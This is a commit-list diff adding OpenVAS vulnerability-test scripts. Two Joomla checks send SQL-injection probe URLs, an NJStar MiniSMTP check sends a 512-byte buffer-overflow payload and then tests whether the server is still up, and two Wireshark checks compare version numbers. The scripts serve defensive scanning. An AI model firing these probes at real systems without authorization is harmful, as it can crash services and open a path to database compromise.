+  Affected Software/OS:
+  Joomla! Barter Sites Component Version 1.3
+
+  Fix: No solution or patch is available as on 4th November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.barter-sites.com
+
+  References:
+  http://osvdb.org/show/osvdb/76270
+  http://secunia.com/advisories/46368
+  http://www.exploit-db.com/exploits/18046
+  http://packetstormsecurity.org/files/105626/joomlabarter-sqlxss.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla! Barter Sites component is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Joomla Directory
+if(!dir = get_dir_from_kb(port:port,app:"joomla")) {
+  exit(0);
+}
+
+## Construct the Attack Request
+url = dir + "/index.php?option=com_listing&task=browse&category_id=1'";
+
+## Try attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Invalid argument supplied for foreach\(\)",
+                   extra_check:">Warning<")){
+  security_hole(port);
+}

Added: trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,104 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_techfolio_comp_catid_param_sql_inj_vuln.nasl 18227 2011-11-04 11:11:11 nov $
+#
+# Joomla! Techfolio Component 'catid' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802267);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-04 12:12:12 +0530 (Fri, 04 Nov 2011)");
+  script_bugtraq_id(50422);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Joomla! Techfolio Component 'catid' Parameter SQL Injection Vulnerability");
+  desc = "
+  Overview: This host is running Joomla! Techfolio component and is prone to
+  SQL injection vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused by improper validation of user-supplied input via the
+  'catid' parameter to index.php (when 'option' is set to 'com_techfolio'
+  and 'view' is set to 'techfoliodetail'), which allows attacker to manipulate
+  SQL queries by injecting arbitrary SQL code.
+
+  Impact:
+  Successful exploitation will let attackers to cause SQL Injection attack and
+  gain sensitive information.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  Joomla! Techfolio Component Version 1.0
+
+  Fix: No solution or patch is available as on 4th November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.techdeluge.com/joomla-component/com_techfolio.zip
+
+  References:
+  http://xforce.iss.net/xforce/xfdb/71029
+  http://www.exploit-db.com/exploits/18042/
+  http://packetstormsecurity.org/files/106353/joomlatechfolio-sql.txt ";
+
+  script_description(desc);
+  script_summary("Check if Joomla! Techfolio component is vulnerable to SQL Injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Web application abuses");
+  script_dependencies("joomla_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Joomla Directory
+if(!dir = get_dir_from_kb(port:port,app:"joomla")) {
+  exit(0);
+}
+
+## Construct the Attack Request
+url = dir + "/index.php?option=com_techfolio&view=techfoliodetail&catid=1'";
+
+## Try attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Invalid argument supplied for foreach\(\)",
+                   extra_check:">Warning<")){
+  security_hole(port);
+}

Added: trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_njstar_communicator_minismtp_server_bof_vuln.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_njstar_communicator_minismtp_server_bof_vuln.nasl 18302 2011-11-03 11:11:11Z nov $
+#
+# NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802266);
+  script_version("$Revision: $");
+  script_cve_id("CVE-2011-4040");
+  script_bugtraq_id(50452);
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 19:46:14 +0530 (Tue, 08 Nov 2011)");
+  script_name("NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability");
+  desc = "
+  Overview: The host is running NJStar Communicator MiniSMTP Server and is
+  prone to buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to a boundary error within the MiniSmtp server when
+  processing packets. This can be exploited to cause a stack-based buffer
+  overflow via a specially crafted packet sent to TCP port 25.
+
+  Impact:
+  Successful exploitation may allow remote attackers to execute arbitrary code
+  within the context of the application or cause a denial of service condition.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  NJStar Communicator Version 3.00
+
+  Fix: No solution or patch is available as on 3rd November, 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.njstar.com/cms/download
+
+  References:
+  http://osvdb.org/show/osvdb/76728
+  http://secunia.com/advisories/46630
+  http://www.exploit-db.com/exploits/18057";
+
+  script_description(desc);
+  script_summary("Determine NJStar Communicator MiniSMTP Server Buffer Overflow Vulnerability");
+  script_category(ACT_DENIAL);
+  script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("find_service.nes", "smtpserver_detect.nasl");
+  script_require_ports("Services/smtp", 25);
+  exit(0);
+}
+
+
+include("smtp_func.inc");
+
+## Get SMTP Port
+port = get_kb_item("Services/smtp");
+if(!port) {
+  port = 25;
+}
+
+if(get_kb_item('SMTP/'+port+'/broken')) {
+  exit(0);
+}
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Open SMTP Socket
+if(!soc = smtp_open(port:port)) {
+  exit(0);
+}
+
+## Get Banner
+res = recv(socket:soc, length:512);
+
+## Confirm Application
+send(socket:soc, data:'HELP\r\n');
+res = recv(socket:soc, length:1024);
+if("E-mail Server From NJStar Software" >!< res)
+{
+  smtp_close(socket:soc);
+  exit(0);
+
+}
+
+## Sending Exploit
+send(socket:soc, data:crap(512));
+smtp_close(socket:soc);
+
+## Open the socket and Check server is dead or alive
+if(!soc = smtp_open(port:port))
+{
+  security_hole(port);
+  exit(0);
+}
+smtp_close(socket:soc);

Added: trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_wireshark_bof_n_dos_vuln_win.nasl 18418 2011-11-08 11:40:17 nov $
+#
+# Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802502);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 11:40:17 +0200 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-4102", "CVE-2011-4101");
+  script_bugtraq_id(50486, 50481);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark Heap Based BOF and Denial of Service Vulnerabilities (Windows)");
+  desc = "
+  Overview: The host is installed with Wireshark and is prone to heap based
+  buffer overflow and denial of service vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to,
+  - An error while parsing ERF file format. This could cause wireshark to crash
+    by reading a malformed packet trace file.
+  - An error in dissect_infiniband_common function in
+    epan/dissectors/packet-infiniband.c in the Infiniband dissector, could
+    dereference a NULL pointer.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service via
+  via a malformed packet.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 1.4.0 through 1.4.9 and 1.6.x before 1.6.3
+
+  Fix: Upgrade to the Wireshark version 1.6.3 or later,
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=750645
+  http://openwall.com/lists/oss-security/2011/11/01/9
+  https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6476
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39508
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39500 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_family("General");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+wiresharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!wiresharkVer){
+  exit(0);
+}
+
+## Check for Wireshark Version
+if(version_in_range(version:wiresharkVer, test_version:"1.4.0", test_version2:"1.4.9")||
+   version_in_range(version:wiresharkVer, test_version:"1.6.0", test_version2:"1.6.2")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_bof_n_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl	2011-11-08 15:45:51 UTC (rev 12044)
+++ trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl	2011-11-08 15:46:26 UTC (rev 12045)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_wireshark_csn1_dissector_dos_vuln_win.nasl 18418 2011-11-08 11:55:17 nov $
+#
+# Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802503);
+  script_version("$Revision: $");
+  script_tag(name:"last_modification", value:"$Date: $");
+  script_tag(name:"creation_date", value:"2011-11-08 11:55:17 +0200 (Tue, 08 Nov 2011)");
+  script_cve_id("CVE-2011-4100");
+  script_bugtraq_id(50479);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Wireshark CSN.1 Dissector Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Wireshark and is prone to denial of
+  service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error in csnStreamDissector function in
+  epan/dissectors/packet-csn1.c in the CSN.1 dissector, which fails to
+  initialize a certain variable.
+
+  Impact:
+  Successful exploitation could allow attackers to cause a denial of service via
+  via a malformed packet.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Wireshark version 1.6.x before 1.6.3
+
+  Fix: Upgrade to the Wireshark version 1.6.3 or later,
+  For updates refer, http://www.wireshark.org/download.html
+
+  References:
+  https://bugzilla.redhat.com/show_bug.cgi?id=750643
+  http://openwall.com/lists/oss-security/2011/11/01/9
+  http://www.wireshark.org/security/wnpa-sec-2011-17.html
+  https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6351
+  http://anonsvn.wireshark.org/viewvc?view=revision&revision=39140 ";
+
+  script_description(desc);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_summary("Check the version of Wireshark");
+  script_category(ACT_GATHER_INFO);
+  script_family("Denial of Service");
+  script_dependencies("gb_wireshark_detect_win.nasl");
+  script_require_keys("Wireshark/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+wiresharkVer = get_kb_item("Wireshark/Win/Ver");
+if(!wiresharkVer){
+  exit(0);
+}
+
+## Check for Wireshark Version
+if(version_in_range(version:wiresharkVer, test_version:"1.6.0", test_version2:"1.6.2")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/gb_wireshark_csn1_dissector_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *



More information about the Openvas-commits mailing list